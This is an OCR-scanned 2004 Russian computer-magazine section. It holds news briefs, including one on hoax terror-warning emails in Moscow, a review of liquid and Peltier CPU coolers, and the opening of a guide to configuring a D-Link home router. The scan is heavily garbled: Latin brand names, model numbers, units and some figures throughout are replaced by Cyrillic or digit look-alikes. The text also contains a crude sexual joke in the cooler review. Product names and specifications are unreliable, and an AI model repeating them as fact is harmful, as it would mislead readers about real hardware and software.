К орпорация МісгозоК 
заявила о присоеди- 
нении России-матушки к 
новой программе распро- 
странения оси для совсем 
непродвинутых пользова- 
телей (читай чайников) - 
ѴѴіпсІоѵѵз ХР ЗІаПег ЕсІШоп. 
До этого такой чести удос- 
тоились всего три страны: 
Таиланд, Малайзия и Ин- 
донезия. Стартовая вер- 
сия ХР представляет собой 
самую дешевую версию 



операционки семейства 
ѴѴіпсІоѵѵз, она будет уста- 
навливаться на продавае- 
мые компьютеры. Ось 
имеет ограничения, среди 
которых невозможность 
одновременного запуска 
более трех программ, зап- 
рет подключения к локалке 
и ограничение на макси- 
мальное разрешение в 
800x600 пикселов. Зато в 
нее включена куча обучаю- 
щих материалов (как текс- 



тов, так и видеоуроков) и 
патриотических визуаль- 
ных тем. Так, русская вер- 
сия имеет скринсейвер с 
развевающимся российс- 
ким флагом и море обоин 
с видами русских дере- 
вень. По мнению Майкро- 
софта, именно это помо- 
жет людям, которые ни- 
когда не садились за 
компьютер, преодолеть 
психологический барьер и 
сделать это. ■ 



МЫЛЬНЫЙ джиклд 



взлом 



В сентябре многие 
москвичи полу- 
чили по мылу сообще- 
ния, в которых крас- 
норечиво извещалось 
о грядущих вскоре те- 
рактах. Письма прихо- 
дили от людей, якобы 
имеющих связи в выс- 
ших кругах и желаю- 
щих предупредить ос- 
тальных. Вот текст одного из таких 
писем: «Только что прислала хоро- 
шая знакомая, с родней в ФСБ. До- 
рогие мои! Хочу Вас проинформи- 
ровать, что несколько минут назад я 
получила информацию из источни- 
ков, на 200% заслуживающих дове- 
рия, о том, что в Москве на данный 
час находится минимум 20 терро- 
ристов-смертников и запланирован 
ряд крупных террористических ак- 
тов на период этой недели. По воз- 
можности надо исключить посеще- 



ние метро, общест- 
венного наземного 
транспорта, кафе, 
торговых центров, 
рынков, а лучше вооб- 
ще на время уехать из 
Москвы. Пожалуйста, 
берегите себя и своих 
близких. Это все не 
шутки, а очень страш- 
ная реальность». 
Послания анонимны, поэтому оче- 
видно, что таким образом «добро- 
желатели» пытаются посеять пани- 
ку. Правоохранительные органы не 
сомневаются, что это дело рук тер- 
рористов. Страх - основная цель 
терроризма, и подобная акция 
очень хорошо подстегивает это 
чувство. Так что если тебе, дружи- 
ще, свалится в ящик подобный 
спам - поступи с ним единственно 
правильным способом. Через кно- 
почку «РеІ». ■ 




МОБИПЬНЫИ кпиень 



ЖЕЛЕЗО 



С вой первый процессор, ориенти- 
рованный на использование в 
мобильных телефонах, предложила 
разработчикам компания МЕС 
ЕІесігопісз. Новинка, МР211, выгодно 
отличается от конкурентов снижен- 
ным энергопотреблением, возмож- 
ностью параллельной многокон- 
вейерной обработки данных, приема 
цифрового телесигнала, поддержки 
видеоконференций и воспроизведе- 
ния музыки. Новый кристалл исполь- 
зует целых три ядра АРМ926ЕЭ-5, ра- 
ботает на частоте 200 МГц, использу- 
ет 48 Кб кэши инструкций и данных. 
Прямо на процессоре интегрировано 
640 Кб памяти, имеется также развод- 
ка для памяти РОП ЗйПАМ. Что любо- 




пытно, прямо на кристалле смонтиро- 
ваны разъемы интерфейса ЖК-экрана 
и камеры, а также ІТІІ-Я ВТ.656. В 
этой модели доступен 20/30 графи- 
ческий акселератор и процессор 
изображения с поддержкой масшта- 
бирования и вращения изображения 
115В ОТО. Напряжение питания сос- 
тавляет 1,8 В, напряжение питания 
ядра - 1 ,2 В при работе, і 



ю 




БИРЖЕВОЙ Ф0НТ0Н 



НІТЕСН 



С туденты -художники из Голландии 
представили оригинальную хай-тек 
инсталляцию с фонтаном. ОаМшпІаіп 
(сШоип(аіп.пехІпаІиге.пеІ) - это не просто 
столбы воды, а настоящий информацион- 
ный дисплей с ЕФегпеІ-соединением. Три 
струи показывают реальное соотношение 
курсов основных валют - доллара, евро и 
иены. Высоту струй регулирует частотный модулятор. Информация обнов- 
ляется каждые 5 минут. Размеры фонтана - 5x4x3 м. Такой фонтан можно 
легко приспособить для трансляции последних дорожных сводок и прогно- 
зов погоды. ■ 




новая ФПЕШка 



Т ремя новыми версиями ІІ5В-на- 
копителей обновила свою линей- 
ку РаІаТгаѵеІег компания Кіпдзіоп 
Тесііпоіоду. На этот раз в пресс-рели- 
зе сообщается о выходе следующих 
устройств: ЭаІаТгаѵеІег II, ЭаіаТгаѵеІег 
II РІиз и ЭаіаТгаѵеІег ЕІііе. Первые две 
флешки поставляются с крутой софти- 
ной Беси геТ гаѵеіег , которая позволяет 
создавать защищенные 




паролем разделы ІІЗВ-диска. При 
этом скорость передачи для 
ЭаІаТгаѵеІег II составляет 1 1 Мб/с при 
чтении, 7 Мб/с - при записи, анало- 
гичные показатели РаІаТгаѵеІег II РІиз 
составляют 19 и 13 Мб/с соответ- 
ственно. Что же насчет элитной вер- 
сии ОаіаТгаѵеІег ЕІііе? Эта флешка 
предлагает пользователю передавать 
данные со скоростью до 24 Мб/с при 
чтении и 14 Мб/с при записи, при 
этом доступна возможность загрузки 
системы с ІІЗВ-накопителя. За безо- 
пасность информации здесь отвечает 
тулза Т гаѵеІегЗаТе+ , которая использу- 
ет современный 1 28-битный 
алгоритм АЕ5. і 
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Новые увлечения для всей семьи. 
Проводите время вместе! 

Огромные возможности 
компьютера ѴѴіепег Рго 
на базе процессора 
ІпіеІ® Репііит® 4 
с технологией НТ 
откроют новые общие 
интересы для детей, 
их мам и пап! 



ГОДА 

ГАРАНТИИ 

БЕСПЛАТНОЕ ВЫЕЗДНОЕ ГАРАНТИЙНОЕ 
ОБСЛУЖИВАНИЕ КОМПЬЮТЕРА В МОСКВЕ И 
САНКТ-ПЕТЕРБУРГЕ (для всех компьютеров, 
купленных с 1 сентября 2004 г.) 
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Товар сертифицирован. 

ІпіеІ, ІпіеІ Іодо, ІпіеІ Іпзісіе, ІпіеІ Іпзісіе Іодо, ІпіеІ Сепігіпо, ІпіеІ Сепігіпо Іодо, Сеіегоп, 
ІпіеІ Хеоп, ІпіеІ ЗреесІЗІер, Ііапіит, апсі Репііит аге Ігасіетагкз ог гедізіегесі Ігасіетагкз 
о( ІпіеІ Согрогаііоп ог ііз зиЬзісІіагіез іп іЬе Упііесі Зіаіез апсі оіііег соипігіез. 

Оптовые продажи: тел. (095) 956-05-22 








ЖЕЛЕЗО 



ШЕР/И» 10(701/2004 



КОСТНЫЕ 




ОКПОЖДЕНИЯ 



А ИЕТОДИКО ТЕСТИРОВОНИЯ 

Для тестирования была выбрана 
материнская плата АЬіІ КЭ7-Е, кото- 
рая снимает показания с темпера- 
турного датчика, встроенного в яд- 
ро процессора и показывающего 
наиболее достоверные данные. 
Тестирование проводилось вне кор- 
пуса в закрытой комнате без сквоз- 
няков. Оценка шума проводилась 
субъективно. Для измерения темпе- 
ратуры запускалась программа для 
разогрева процессора З&М 0.2.1 , и 
после ее пуска каждые 30 секунд 
снимались показания температуры 
в течение 20 минут. Если скорость 
вращения вентиляторов регулиро- 
валась, производительность систе- 
мы охлаждения ставилась на макси- 
мум. На основе этих данных строи- 
лись графики. Системы водяного 
охлаждения перед началом теста 
прогревались после первого пуска 
по 3 часа при нагруженном на 1 00% 
процессоре и еще 30 минут в режи- 
ме ожидания для установления нор- 
мального температурного режима. 
Водоблок (ватерблок) для видеочи- 
па в контур не устанавливался. 



Чем сложнее система, 
тем чаще она ломается. 



А ТЕХНОЛОГИИ. ТРУБКИ 

Один из подвидов систем жидкост- 
ного охлаждения - это кулеры с 
трубками, так называемая техноло- 
гия ШегтаІ ШЬе. За точку отсчета 
был взят факт того, что тепло от 
процессора к радиатору уходит не 
очень эффективно. Даже несмотря 
на термопасту, медные сердечни- 
ки, цельномедный вентилятор и 
прочее. К решению проблемы по- 
дошли творчески и решили немно- 
го поменять традиционную схему 
охлаждения - вентилятор плюс ра- 
диатор, добавив туда полые труб- 
ки, внутри которых находится жид- 
кость. Теперь система выглядит 
так. Основание (медное или алю- 
миниевое) прилегает к процессору. 
От основания отходят медные труб- 



ки (обычно три или четыре), кото- 
рые соединяют его с радиатором. 
Грубо говоря, жидкость, нагревае- 
мая теплом, исходящим от процес- 
сора, толкает это тепло вверх по 
трубкам, на радиатор. Теплота тра- 
тится на испарение жидкости в го- 
рячей, прилегающей к процессору 
части трубы; в холодной части, об- 
дуваемой кулером, пар конденси- 
руется и отдает свою теплоту ради- 
атору, вынесенному далеко за пре- 
делы процессора. Иногда внутри 
трубок применяются капилляры для 
улучшения их свойств. Термальные 
трубы отводят тепло лучше, чем 
медный или алюминиевый стер- 
жень аналогичного диаметра. 

Вентилятор может крепиться на 
радиатор сверху, как обычно, а мо- 



ІезІ_ІаЬ выражает благодарность 
за предоставленное на тестирование 
оборудование компаниям 
МЕѴАйА (ш/ѵѵ.пеѵасіа.ги, т. 101-2819), 
ЗІ.одіс (мѵѵѵ.ЗІодіс.ги, т. 737-6109), 
«Инлайн» (ѵѵѵтѵѵ. і2Ь.ги, т. 941-6161) 



СПИСОК ПР0ТЕСТИР0ВПНН0Г0 0Б0РУД0ВПНИЯ 



Шап Ж-А04 
7аІтап Кезегаіог 



СідаЬуІе ЗР Сооіег РКО 



ТііегтаІІаке ЗиЬ 2его 46 



ТііегтаІІаке Зііепі Тош 



ТЕСТОВЫЙ СТЕНД 



Материнская плата: АЫ1 К67-Е 
Процессор: АМО АШоп 2800+ (Зетргоп) 



Память: 2x256 Мб Кіпдтах 00К400 



I Сергей Никитин, Дмитрий Шамаев, 1ез1_1аЬ (1ез1_ІаЬідатеІапіі.гіі) 



0 от и закончилось пето, автоматически ушли и некоторые проблемы с охпаждениеи систеиного блока. 
Можно его завинтить, убрать от него настольный вентилятор и прочие ухищрения. Но, к сожалению, 
месте летней жары занимают другие претенденты на превращение корпуса в ад (если судить по темпе- 
ратуре). Это новые процессоры и видеоплаты, которые в силу своей немеренной мощности выделяют массу 
тепла. Конечно, на видеоплаты ставят вентиляторы и радиаторы с технологией 0ТЕ8, операционки научились 
отключать процессоры во время простоя и динамично менять тактовую частоту, но проблема есть и цветет 
пышным цветом. Традиционные системы охлаждения (радиатор плюс вентилятор) явно перестают справ- 
ляться с возлагаемыми на них задачами. Что же делать (развинтить корпус - это не ответ и не решение)? 
Вспомнив физику, инженеры компаний-производителей систем охлаждения решили противопоставить жид- 
кость теплу. Что из этого получилось, мы и решили выяснить. 



БП: РошМап 420Вт 

жет так, как в системе ТІіегтаІІаке 
ЗіІепІ Тоѵѵег, то есть продувая ради- 
атор насквозь. 

ВОДЯНЫЕ СИСТЕМЫ 

Это уже солиднее, настоящие сис- 
темы водяного охлаждения. Ника- 
ких полумер вроде трубок, все 
честно: вот бак с водой, вот труб- 
ки, по которым она бегает, вот все 
остальное. Как же это работает? В 
роли источника тепла выступает 
процессор, который, собственно, 
и нужно охлаждать. Для этого из 
бака по трубкам к процессору пос- 
тупает жидкость. Бак может быть 
где угодно - либо внутри корпуса, 
либо на нем, либо просто рядом 
на полу лежать. Хватило бы длины 
трубок (как правило, сделаны они 
из резины или гибкого пластика) 
да мощности насоса (помпы), ко- 
торый жидкость и гоняет. Жид- 
кость - обычная или дистиллиро- 
ванная вода, но чаще всего спец- 
состав - как уже говорилось выше, 
из бака идет к процессору, прини- 
мает на себя его тепло и, нагрев- 
шись, бежит дальше. Куда? В хо- 
лодильник на охлаждение. В этой 
роли у нас выступает радиатор, 
который охлаждается традиционно 
- воздухом. Здесь проявляется 
второй плюс водных систем. Ради- 
атор не обязательно должен быть 
внутри системного блока, он мо- 
жет стоять вообще в другом конце 
комнаты - дело опять в длине 
труб, их ширине и мощи насоса. 
Это ведет к тому, что отводимый 
теплый воздух не забивает корпус 
и не греет остальную комплектуху, 
а уходит куда-то в пространство, 
совершенно никому не мешая. Да 
и радиатор этот, опять же благо- 
даря своему присутствию вне кор- 
пуса, может быть абсолютно лю- 
бых размеров. 

Но чем сложнее система, тем ча- 
ще она ломается. Если ты оторвешь 
один лепесток от вентилятора на 
обычной, воздушной, системе ох- 
лаждения, то особого ЧП не будет. 

А вот если у тебя прохудится трубка 





ЖИДКОСТНЫЕ СИСТЕМЫ ОМППЖДЕНИЯ 



Резервуары занимают два рядом 
расположенных 
пятидюймовых отсека. 



или бак с водой и оттуда начнет 
течь... Ну, думаю, ты и сам прек- 
расно представляешь последствия. 
Можно охлаждать видюху, докупив 
водоблок. 

Л ЭПЕИЕНТПЕПЬТЬЕ 

Вне конкурса у нас идет один кулер 
на элементе Пельтье. Почему вне 
конкурса? Да потому, что он не име- 
ет никакого отношения к воде и 



построен на совершенно другом 
принципе работы. Пусть такой кулер 
одинок в нашем обзоре, пусть вне 
конкурса он, но разобраться в том, 
как он работает, необходимо. 

С виду кулеры с элементом 
Пельтье ничем особым не выделя- 
ются - вот радиатор, вот вентиля- 
тор. Суть в другом. Элемент 
Пельтье состоит из чередующихся 
материалов, составляющих много- 



численные термопары. Когда че- 
рез такую конструкцию течет ток, 
то одна ее сторона нагревается, а 
другая охлаждается, причем пере- 
пад температур одинаковый. Этот 
эффект и обнаружил француз 
Пельтье. Элемент Пельтье можно 
назвать насосом, так как по сути 
он просто перекачивает тепло. Со- 
ответственно, холодная сторона 
прилегает к процессору и забира- 
ет от нее тепло, а горячая отдает 
его радиатору, с которого его рас- 
сеивает вентилятор. Минус систе- 
мы в том, что для создания этого 
эффекта элементу нужно неслабое 
количество электричества. Получа- 
ет он его от разъема тоіех и 
собственного контроллера, встав- 
ляемого в гнездо РСІ. 



ТІШ ШС-004 






Ч естная система водяного ох- 
лаждения, то есть не просто 
трубки, а резервуар, помпа - 
в общем, все как положено. 
Собственно резервуары занимают 
два рядом расположенных пятидюй- 
мовых отсека, так что выкидывай от- 
туда все старые СЭ и прочие РЮМ’ы, 
кончай жаться и купи, наконец, нор- 
мальный комбо-драйв. Трубки проз- 
рачные, так что выглядит все краси- 
во. Если старые дисководы жалко, то 
баки с водой можно просто положить 
на корпус, для этого есть специаль- 
ные ножки на липучках и заглушка, 
вставляемая в гнездо РСІ для нор- 
мального размещения шлангов. 
Кстати, сделаны танки из пластмас- 
сы, а трубки резиновые. 

Это действительно СИСТЕМА ох- 
лаждения - водоблоки есть как 
для проца, так и для видеоплаты. 
Правильно, современное видео 
очень горячее, от него видюха 
краснеет и жаром пышет. Вода в 
этой системе охлаждается не 
только в резервуаре (у него есть 
свой вентилятор), но и в отдель- 
ном блоке, который представляет 
собой радиатор с вентилятором. 
Этот блок можно закрепить вин- 
тами на стенке корпуса. Это дает 
дополнительное охлаждение. 

На монохромном экране (он об- 
ладает приятной синей подсвет- 
кой) можно видеть температуру и 
контролировать скорость враще- 
ния обоих вентиляторов. Регуля- 
тор вращения также обладает 
подсветкой, да не простой, а ди- 
намической - в зависимости от 
температуры, а, соответственно, 
и скорости вращения, цвет меня- 
ется от синего до цвета плащей 
римских полководцев - пурпур- 
ного. Последний означает, что 
система работает на полную 
мощность. Также этот регулятор 



управляет помпой, точнее, тем, с 
какой скоростью она гоняет воду. 
Устанавливаться (не без проблем, 
как, впрочем, и все водянки) эта 
система может на все сокеты, кро- 
ме І_СіА 775. 

Температура отслеживается с по- 
мощью специального датчика, ко- 
торый крепится на водоблок про- 
цессора. Выводится она на экран 
главной системы охлаждения. 
Правда, эта температура на 5-10 
градусов отличается от той, кото- 
рую выдает датчик с системной 
платы. 

Много времени у нас ушло на из- 
бавление воды от пузырьков, ко- 
торые сильно понижают эффек- 
тивность охлаждения процессо- 
ра. На системе 7аІтап Везегаіог 
такого не было. 

По шумности данная система на- 
ходится на среднем уровне - это 
на максимальных оборотах. А вот 
при низкой скорости вращения 
шума от нее очень мало, меньше 
даже, чем от тихой башни. 

Что реально понравилось, так 
это легкость установки водобло- 
ка на проц и комплект поставки. 
В нем куча проводов, подроб- 
нейший мануал на русском языке 
и жидкость, добавляемая в воду, 
чтобы та не стала напоминать 
давно не чищенный дачный 
пруд. После смешивания этого 
состава с водой последняя при- 
обретает светло-оранжевый 
цвет. А если еще влить туда спе- 
циальную моддинговую жид- 
кость, чтобы все светилось в 
ультрафиолете... Вот это будет 
дело! 

Показатели максимальной тем- 
пературы весьма высоки и не оп- 
равдывают существенную разни- 
цу в цене с воздушным охлажде- 
нием. 





Водоблок для процессора 


Совместимость с платформами: Зоскеі 370, Зоскеі А, Зоскеі 478, Зоскеі 754, 8оскеІ 940 


Материал радиатора: медь 


Размеры, мм: 63x63x12 


Ватерблок для видеочипа 


Материал: медь 


Размеры, мм: 42x42x15 


Основной теплообменник для воды 


Материал радиатора: алюминий + медь 


Размеры, мм: 109x60x60 


Уровень шума, дБ: 23-34 


Помпа, л/час: 96 


Дополнительный теплообменник для воды 


Материал радиатора: алюминий + медь 


Размеры теплообменника, мм: 95x86,5x76 


Размеры вентилятора, мм: 80x80x35 


Производительность, СРМ: 30,6 - 35,5 


Уровень шума, дБ: 21 - 27 
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ЖИДКОСТНЫЕ СИСТЕМЫ ОХПОЖДЕНИЯ 



Совместимость с платформами: Зоскеі 370, Зоскеі А 
Размеры, мм: 80x68,5x41,3 
Вес, г: 379 

Скорость вентилятора, об/мин: 4800+/-10% 

Уровень шума, дБ: 21-38 
Воздушный поток: 35,3 

Материал: медное основание и алюминиевый радиатор 



ТНЕВМОІТОКЕ 811В 2ЕКО 4С 



К улер, название которого ас- 
социируется с героем 
Моііаі СотЬаі’а, а техноло- 
гическая составляющая - с вполне 
реальным парнем, Пельтье. 

Решив, видимо, что вентилятору 
скучно в компании радиатора, ин- 
женеры ТНегтаІіаке вставили 
между ними элемент этого само- 
го Пельтье. Минус - нужно много 
энергии, которую кулер получает 
через специальный РСІ-блок, а 
тот, в свою очередь, связан с ро- 
зеткой персональной вилкой. 
Скорость снимается через трех- 
пиновый разъем. 



жжжжжжжж 



Крепятся все эти чудеса только на 
Зоскеі А и только с помощью от- 
вертки. Как плюс можно отметить 
поставляемый в комплекте кор- 
пусный вентилятор ( 80 x 80 ) со 
светодиодами. Он очень 
красивый. Есть предпо- 
ложение, что если в кор- 
пусе будет очень тепло, 
то эффективность ох- 
лаждения сильно упадет - 
такова особенность использова- 
ния элемента Пельтье. Стоит ку- 
лер довольно дорого и обладает 
средним уровнем шума, но ох- 
лаждает, к сожалению, плохо. 



гмиои КЕ8ЕВЯТ0В *★★★**★**★ 



С истема, необычная во всех 
отношениях. Как следствие - 
самая лучшая в обзоре. Сос- 
тоит исключительно из двух частей - 
радиатора и водоблока. Почему в 
ней так мало компонентов, будет 
сказано ниже. Водоблок необычный 
в той же мере, что и вся система в 
целом. Он круглый (в большинстве 
водянок резервуары для забора теп- 
ла квадратные) и синий, так же, как 
и все остальные части системы. Ну- 
жен он для охлаждения процессора, 
как опцию можно приобрести во- 
доблоки для видеоплаты и чипсета. 
Шланги непрозрачные, очень длин- 
ные и толстые. Это хорошо, так как 
через них прокачивается больший 
объем воды за единицу времени 
(высокая пропускная способность), 
что самым положительным образом 
сказывается на результате. С одной 
стороны, длинные шланги - это тоже 
хорошо, но вот только они спокойно 
могут перегнуться так, что вода че- 
рез них не потечет. Несмотря на то, 
что путем опускания дамоклова ме- 



ча на шланги их длину можно подог- 
нать под себя, это слишком ради- 
кальное решение. Есть получше - 
вставить в шланг небольшие тонкие 
пружинки. Или правильно проло- 
жить сам шланг. А для того чтобы 
знать, течет ли все внутри как надо, 
есть специальный индикатор. Проб- 
лема с установкой только одна - 
нужно снимать системную плату. А 
так система приводится в рабочее 
состояние очень быстро, у нас на 
это ушло в три раза меньше време- 
ни, чем на аналогичную подготовку 
Тііап’а. Радиатор просто огромен - 
более полуметра высотой, шесть 
кило веса, он здорово похож на тор- 
педу. Чистый алюминий. Устанавли- 
вается он, естественно, вне корпуса, 
питается через отдельную розетку, 
также имеет свой собственный вык- 
лючатель. Активного охлаждения 
(вентилятора) он не имеет, берет 
большой площадью теплообмена. 
Пом па- насос установлена у него 
внутри. То, чем шланги соединяют- 
ся с баком, внушает уважения своей 



мощью и надежностью. Это желез- 
ный штуцер с крепящей его гайкой. 
Кроме необходимости отвинтить 
материнку перед установкой, есть 
еще недостатки. В комплекте нет 
никакого состава, который предо- 
твратил бы гниение воды. Также 
нет никаких дисплеев, показываю- 
щих температуру. 

Но полная, абсолютная бесшум- 
ность и лучший в обзоре темпера- 
турный режим перечеркивают эти 
минусы, а также оправдывают вы- 
сокую стоимость системы. Есть и 
еще один положительный момент. 
Когда девушки будут входить к те- 
бе в комнату и видеть этот радиа- 
тор, то они непроизвольно будут 
восклицать: «Боже, какой же он у 
тебя огромный!». И это еще до то- 
го, как ты снял штаны! 





Водоблок для процессора 


Совместимость с платформами: Зоскеі 370, 
Зоскеі А, Зоскеі 478, Зоскеі 754, Зоскеі 940 


Материал радиатора: анодированный алюминий 
на медном основании 


Размеры, мм: 64x31 


Вес, г: 447 


Ватерблок для видеочипа (поставляется 
опционально за дополнительную плату) 


Материал: медь 


Размеры, мм: 42x42x15 


Теплообменник 


Площадь охлаждения: 1,274 м2 


Помпа, л/нас: 300 


Размеры, мм: 150x150x592 


Вес, кг: 6,5 
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ЖИДКОСТНЫЕ СИСТЕМЫ ОХППЖДЕНИЯ 




6І60ВѴТЕ 30 СОШЕН РНО *★★★★★★ 



рехмерность сегодня очень 
популярна, она добралась 
даже до систем охлаждения. 
Правильно, квадратные радиаторы 
всем уже давно надоели. Ну так 
вот, теперь у нас есть округлый. 
Медное основание соединяется с 
этим трехмерным чудом посред- 
ством четырех трубок. Внутри ра- 
диатора находится не обычный 
вентилятор с лопастями, а его 
собрат турбинного типа. Новая 
технология, скопированная с ка- 
кой-нибудь ГЭС, - правильно, ох- 
лаждение же водяное. 

Основание тут медное, все осталь- 
ное алюминиевое. Все остальное - 


титься так много и быстро, оби- 
делся - это вылилось в его зверс- 
кий, просто ужасный шум. Впечат- 
ление такое, что он переорет вось- 
миканальную звуковую систему с 
парой усилков. Правда, на низких 
оборотах шум вполне приемле- 
мый. Но вообще, для того охлаж- 
дения, которое он обеспечивает, 
кулер громкий. Также от злости он 
светится. Его скорость отслежива- 
ется с помощью трехпинового 
разъема, а питание идет через 
тоіех. Может устанавливаться на 
все сокеты, кроме І_ОА 775. 




это радиатор. А как известно, алю- 
миний проводит тепло хуже, чем 


Совместимость с платформами: Зоскеі 370, 
Зоскеі А, Зоскеі 478, Зоскеі 754 


медь. Соответственно, для улуч- 


Размеры, мм: 83x89x93 


шения отвода тепла количество 


Вес, г: 430 


оборотов вентиля было сделано 


Скорость вентилятора, об/мин: 2000-4000 


высоким - 2000-4000 (плавная ре- 


Уровень шума, дБ: 19,2-37,2 


гулировка через панель, вставляе- 


Воздушный поток: нет данных 


мую в трехдюймовый отсек). Вен- 
тилятор, который заставили кру- 


Материал: медное основание и тепловые 
трубки, алюминиевый радиатор 



ТНЕКИШТаКЕ 8ИЕИТ ТОШЕВ 



Л 

З та тихая башня построена 
на медном фундаменте, от 
которого к радиатору отхо- 
дят шесть опять же медных тру- 
бок. Хороший надежный фунда- 
мент, обладающий высокой теп- 
лопроводимостью. Да и трубки та- 
кие же. Вентилятор расположен не 
горизонтально, а вертикально, так 
что продувает радиатор насквозь - 
этакое технологическое новшест- 
во. Поставить башню можно на 
любой сокет, в том числе на ново- 
модный І_ОА 775. Это единствен- 
ный кулер в обзоре, который по- 
дойдет для этого гнезда. Эконо- 
мические выгоды налицо - когда 
ты купишь системную плату и про- 
цессор формата І_ОА 775, то смо- 
жешь сэкономить на вентиляторе. 



Название свое система, в прин- 
ципе, оправдывает - она доволь- 
но тихая, тут нареканий нет. 

Они вызваны другим - установкой. 
Во-первых, чтобы твой системный 
блок стал обладателем этой тихой 
башни, от него нужно отвинтить 
материнку - такая вот система 
крепления. Но на этом твои мыта- 
рства не закончатся, не надейся. 
Когда ты будешь закреплять все 
это хозяйство на сокете, то наму- 
чаешься - все шатается и держит- 
ся просто на соплях, пока ты все 
не вставишь куда и как надо. А во 
время подобных манипуляций 
очень легко повредить проц, мы 
это испытали на себе. Да и высота 
башни такова, что влезет она да- 
леко не во все корпуса. 




★★★★★★★★★ 




Совместимость с платформами: $оскеі 370, Зоскеі А, Зоскеі 478, Зоскеі 754, Зоскеі 940, ЮА775 



Размеры, мм: 86x110x138 



Вес, г: 640 



Скорость вентилятора, об/мин: 2500 + /-10% 



Уровень шума, дБ: 21 



Воздушный поток: 52,24 



Материал: медное основание и тепловые трубки, алюминиевый радиатор 
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Первое место у системы 2аІтап ВезегаЬг - 
это неоспоримый факт. Она бесшумна и 
крайне эффективна. Тііап не оправдал себя 



его цена несопоставима с тем, что он готов 
тебе предложить. Хорошее впечатление 
оставил ТГіегтаІІаке Зііепі Томе г. Интересное 



техническое решение, низкий шум, высокий 
результат, хорошая цена. Но лучше брать эту 
систему в варианте с медным радиатором. 







НРСТРРИВРЕМ 

домашний роутер 



I Рпексей Мапашин, ІезМаЬ (ІезМаЬідатеІапіІ.ги) 



0 связи с нарастающим внедрением широкопопосного доступа в интернет в поспеднее время попучили боль- 
шое распространение небольшие домашние сети, ограниченные пределами одной-четырех квартир, с точ- 
кой выхода в глобальную сеть. Для распределения и учета трафика обычно ставится отдельный компью- 
тер-сервер, выполняющий роль программного маршрутизатора (а также файрвола, веб-сервера и прочих серви- 
сов сети], через который все пользователи и выходят в интернет. Но с такой топологией построения сети време- 
нами возникают проблемы - то сервер упадет из-за ошибки в программе, то вдруг сосед Вася решип поупраж- 
няться во взломе системы, ну ипи вдруг вышеп новый сетевой червь, удаленно заражающий компьютеры... 



И ли возьмем другую си- 
туацию - в квартире 
имеется несколько 
компьютеров, объеди- 
ненных между собой 
маленькой локальной 
сетью (причем некоторые из них 
являются мобильными устройства- 
ми вроде ноутбука или КПК), у ко- 
торой также есть выход в интер- 
нет. Все бы хорошо, но для ис- 
пользования ресурсов Ш\І прихо- 
дится постоянно держать включен- 
ным компьютер, который подсое- 
динен к внешнему миру, а еще 
стоит вспомнить наличие принте- 
ра, к которому тоже должен быть 
доступ с любого компа. Вдобавок, 
не стоит сбрасывать со счетов си- 
туацию, когда, например, ноутбук 
или КПК используется как дома, 
так и на работе, а ведь конфигура- 
ция сети разная (адресное прост- 
ранство). Конечно, можно исполь- 
зовать специальные программы, 
меняющие настройки сетевой кар- 
ты, но зачем, если эта проблема 
решается гораздо проще. 

Сегодня речь пойдет о таком по- 
лезном и удобном устройстве, как 
маршрутизатор (роутер), который 
призван решить большинство проб- 
лем, описанных выше. Попробуем 
разобраться, как оптимально наст- 
роить под себя эту маленькую коро- 
бочку с рядом лампочек. 

Л ЧТО НУЖНО 

Мы будем исходить из того, что в 
наличии имеются три компьютера 
(два стационарных, один ноутбук), 
соединенных между собой при помо- 
щи хаба (маленькая квартирная 
сеть), а подключение к интернету 




РОУТЕР 0-ШИК 0І-Ѳ24ІІІІР< 



организовано посредством АОЗІ_ ІАИ 
модема. Посмотрим, как можно ор- 
ганизовать и настроить сетевые ре- 
сурсы при помощи роутера. Общий 
вид схемы подключения - на рис. 1 . 

^шоп 

Предварительная настройка марш- 
рутизатора. Конечно же, конфигура- 
ция по умолчанию нас не устраивает 
(во многих дефолтных настройках 
обнаруживаются серьезные дыры, 
вот и у оказавшейся у нас модели 
нашлось целых две уязвимости), по- 
этому, приложив все усилия, поста- 
раемся защитить и себя, и свою ма- 
ленькую сеть. 

Первым делом нужно найти в Ма- 
нуэле информацию о том, по како- 
му адресу искать маршрутизатор и 
какой пароль администратора при 
заводской настройке нужно вводить 
(в нашем случае это оказалось 
Шр://192.168.1.1 и пользователь абтіп 
без пароля). После указания этой 
информации в браузере становится 
доступным веб-интерфейс конфигу- 
рирования роутера (рис. 2 отобра- 
жает картину нашего устройства). 
Судя по тотальному заполонению 
мастеров во всех программах, ско- 
ро установить и настроить архис- 
ложный мегасервер станет не труд- 
нее, чем поставить ОСь на новый 
компьютер. Но не будем выделять- 
ся из общества и брезговать авто- 
матической настройкой (позже все 
равно некоторые параметры при- 
дется изменить вручную), запустим 
визарда. В нашем случае первым 
делом потребовалось сменить па- 
роль на новый (очень неплохое на- 
чало, здесь главное - придумать 
что-то позаковыристее, ведь роутер 
будет являться сердцем всей се- 
ти!), что мы и сделали. Далее вы- 
бираем временную зону (ОМТ 
+03:00 Мозсоѵѵ, Зі РеіегзЬигд, 
Ѵоідодгаб), после чего выявляется 



д 



ля статьи мы выбрали один из наиболее навороченных роутеров, чтобы по- 
казать и объяснить все возможные настройки сети, на деле же нужно искать 
устройство, которое будет способно обеспечить выполнение конкретных тре- 
бований, поскольку за каждую дополнительную примочку приходится выклады- 
вать определенную сумму дяде продавцу. 

Наша модель (О-Ыпк ОІ-824ѴІІР+) умеет следующее: 

О. Собственно маршрутизировать (как проводные, так и беспроводные сети 
стандарта 802.1 1д). 

О. Транслировать адреса (ЫАТ). 

Ѳ. Работать в качестве файрвола. 

О. Обнаруживать и локализовывать некоторые ОоЗ-атаки. 

О. Работать с кабельным/хОЗІ_/ОіаІІІр модемом, обеспечивая выход в интернет. 

О. Поддерживать принтеры, подключающиеся через интерфейс 115В и І_РТ (для 
создания принт-сервера). 

О. Создавать ОНСР-сервер. 

О. Плюс некоторые другие особенности... 





НОСТРОМВОЕИ ДОНПШНИЙ РОУТЕР 




Наш роутер поддерживает 
беспроводную связь. 



первая проблема мастера: он пыта- 
ется автоматически определить 
настройки интернета, но поскольку 
еще ничего не установлено, этот 
шаг завершается относительной не- 
удачей - пользователю предлагает- 
ся самому задать нужные парамет- 
ры (рис. 3). Поскольку мы догово- 
рились, что выход в глобальную 
сеть производится посредством 
АОЗЬмодема, выбираем пункт 
«РРР оѵег ЕШегпеі» (или РРРоЕ) и 
указываем имя пользователя и па- 
роль на доступ. Наш роутер под- 
держивает беспроводную связь и, 
как следствие, следующим шагом 
мастера является просьба о наст- 
ройке этого типа соединения. Но 
поскольку сейчас перед нами такая 
задача не стоит, попросту пропус- 
каем этот шаг или хотя бы задаем 
